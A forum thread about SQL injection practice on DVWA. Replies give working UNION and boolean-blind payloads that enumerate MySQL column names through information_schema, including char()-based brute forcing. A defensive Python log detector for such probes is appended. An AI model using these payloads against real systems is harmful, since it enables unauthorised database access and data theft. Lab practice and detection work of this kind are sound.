How to drag column names up from mySQL? – Digitalmunition





This topic contains 1 reply, has 2 voices, and was last updated by  einfallstoll 1 month, 2 weeks ago.

  • #255317

    anonymous
    Participant

    My payload: `6' UNION (SELECT ?, ? FROM information_schema.columns WHERE COLUMN_NAME = 'users')--`
    I am doing SQL injection on DVWA, and I am wondering if there is a way to pull out column names from a table. Or is it a guessing game?

  • #255318

    einfallstoll

    The information_schema columns table is public information and you can find all valid column names in the MySQL documentation.

    ```
    6' UNION (SELECT TABLE_NAME, COLUMN_NAME FROM information_schema.columns)--
    ```

  • #255319

    [deleted]

    [deleted]

  • #255320

    VampireFluf

    With this stackoverflow question you can find your answer: [https://stackoverflow.com/questions/193780/how-to-find-all-the-tables-in-mysql-with-specific-column-names-in-them](https://stackoverflow.com/questions/193780/how-to-find-all-the-tables-in-mysql-with-specific-column-names-in-them)

  • #255321

    musicin3d

    I haven’t played with DVWA, but I’ll share something I’ve enjoyed doing…

    Sometimes your SQL injection doesn’t return data, but you can tell if it was successful or not. For example, the vulnerable page might be loading products. If you inject a condition that evaluates to false then the page will show no products (or it might just crash). Using that you can inject something like `and exists(select * from information_schema.columns where column_name = 'password')` and see if they are storing passwords anywhere in the database.

    The fun happens when you combine this true/false test with binary search and `char(x)` to perform a bruteforce search for column and table names. Write a script and let it run all day. XD

    `and exists(select * from information_schema.columns where length(column_name) = 8 and column_name like concat('pass', char(110), '%'))`

    `and exists(select * from information_schema.columns where length(column_name) = 8 and column_name like concat('pass', char(116), '%'))`

    `and exists(select * from information_schema.columns where length(column_name) = 8 and column_name like concat('pass', char(120), '%'))`
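As an added example from the defender's side (not code from this thread or from DVWA): a small Python detector that reads constructed MySQL general-log-style lines and flags connections that replay the same information_schema probe with only the `char(x)` value changing, which is the signature of the column-name enumeration loop described above. The log line layout, connection ids and the probe threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed MySQL general_log-style lines (not real DVWA output): one benign
# query, one UNION dump of information_schema, and a run of boolean-blind
# probes that differ only in the char(x) value, as in the thread above.
SAMPLE_LOG = """\
T1 12 Query SELECT first_name FROM users WHERE user_id = '1'
T2 12 Query SELECT first_name FROM users WHERE user_id = '6' UNION (SELECT TABLE_NAME, COLUMN_NAME FROM information_schema.columns)-- '
T3 12 Query SELECT first_name FROM users WHERE user_id = '1' and exists(select * from information_schema.columns where length(column_name) = 8 and column_name like concat('pass', char(110), '%'))-- '
T4 12 Query SELECT first_name FROM users WHERE user_id = '1' and exists(select * from information_schema.columns where length(column_name) = 8 and column_name like concat('pass', char(116), '%'))-- '
T5 12 Query SELECT first_name FROM users WHERE user_id = '1' and exists(select * from information_schema.columns where length(column_name) = 8 and column_name like concat('pass', char(120), '%'))-- '
T6 13 Query SELECT first_name FROM users WHERE user_id = '2'
"""

LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+Query\s+(?P<sql>.*)$")  # assumed layout
INFO_SCHEMA = re.compile(r"information_schema\.", re.I)
BLIND_PROBE = re.compile(r"\bexists\s*\(", re.I)
CHAR_CALL = re.compile(r"\bchar\s*\(\s*\d+\s*\)", re.I)

def parse(log_text):
    """Yield (timestamp, connection id, sql) for each Query line."""
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            yield m.group("ts"), m.group("conn"), m.group("sql")

def classify(sql):
    """Tag one statement; the application's own queries never touch information_schema."""
    tags = set()
    if INFO_SCHEMA.search(sql):
        tags.add("information_schema")
        if BLIND_PROBE.search(sql):
            tags.add("boolean_probe")
        if CHAR_CALL.search(sql):
            tags.add("char_probe")
    return tags

def detect_enumeration(log_text, min_probes=3):
    """Return {conn: count} for connections whose char() probes collapse to one
    template, i.e. the same statement replayed with only char(x) varying."""
    templates = defaultdict(lambda: defaultdict(int))
    for _, conn, sql in parse(log_text):
        if "char_probe" in classify(sql):
            templates[conn][CHAR_CALL.sub("char(N)", sql)] += 1
    return {c: max(t.values()) for c, t in templates.items()
            if max(t.values()) >= min_probes}
```

Running `detect_enumeration(SAMPLE_LOG)` on the constructed log returns `{'12': 3}`: connection 12 is the only one repeating a templated probe. Lowering `min_probes` trades false positives for earlier alerting.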
